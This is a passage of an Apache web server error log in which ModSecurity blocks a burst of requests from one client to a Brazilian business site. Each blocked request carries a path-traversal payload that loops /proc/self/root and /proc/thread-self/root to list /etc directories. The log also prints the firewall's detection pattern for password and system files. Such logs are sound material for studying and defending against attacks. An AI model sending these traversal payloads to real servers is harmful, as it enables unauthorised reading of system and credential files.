[unique_id "abzi49a6ubjKNq_cu4aXeQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:13.814950 2026] [:error] [pid 30424:tid 140411624429312] [client 74.7.241.31:52148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi5ct36Dv4L1GW-s-gxgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:15.603382 2026] [:error] [pid 8307:tid 140411649607424] [client 74.7.241.31:52158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi57-FhjpZGs9ba8qteAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:17.462497 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:44612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi6fXLqtnMIWvjpaJhCwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:18.978131 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:44618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi6ta6ubjKNq_cu4aXhgAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:21.051046 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:44628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi7fqxLDW4GITHUkSrvQAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:22.955379 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:44630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi7uoXxyEfFpUF8f9NJAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:24.693930 2026] [:error] [pid 30424:tid 140411548894976] [client 74.7.241.31:44634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi8Mt36Dv4L1GW-s-g0gAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:25.155577 2026] [proxy_fcgi:error] [pid 21219:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59766] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:02:26.186766 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:44650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi8hCii7xarUs8iHYsoQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:27.519527 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.241.31:35110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi87-FhjpZGs9ba8qtgQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:31.197577 2026] [:error] [pid 30424:tid 140411582465792] [client 74.7.241.31:35112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi98t36Dv4L1GW-s-g3AAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:32.926045 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:35118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi-AF0L0L-SsrnPo4xMQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:33.566117 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 57.141.18.24:38084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:02:35.852430 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:35120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi-ta6ubjKNq_cu4aXmgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:38.191352 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:60950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzi_gkwaGbbGflqUZANngAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:40.399184 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:60962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjANa6ubjKNq_cu4aXogAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:45.604129 2026] [:error] [pid 8307:tid 140411699963648] [client 74.7.241.31:60972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjBb-FhjpZGs9ba8qtkwAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:47.129780 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60594] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:02:49.611975 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:38686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjCfXLqtnMIWvjpaJhJwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:02:52.078313 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:38688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjDBCii7xarUs8iHYsugAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:54.957474 2026] [:error] [pid 30424:tid 140411590858496] [client 74.7.241.31:38692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjDst36Dv4L1GW-s-g7gAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:57.039469 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:38696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjEfXLqtnMIWvjpaJhLgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:02:59.522536 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:47048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjEwF0L0L-SsrnPo4xRwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:03:00.616571 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:47054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjFPXLqtnMIWvjpaJhLwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:03:02.502926 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:47054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjFfXLqtnMIWvjpaJhMwAAAoA"], referer: 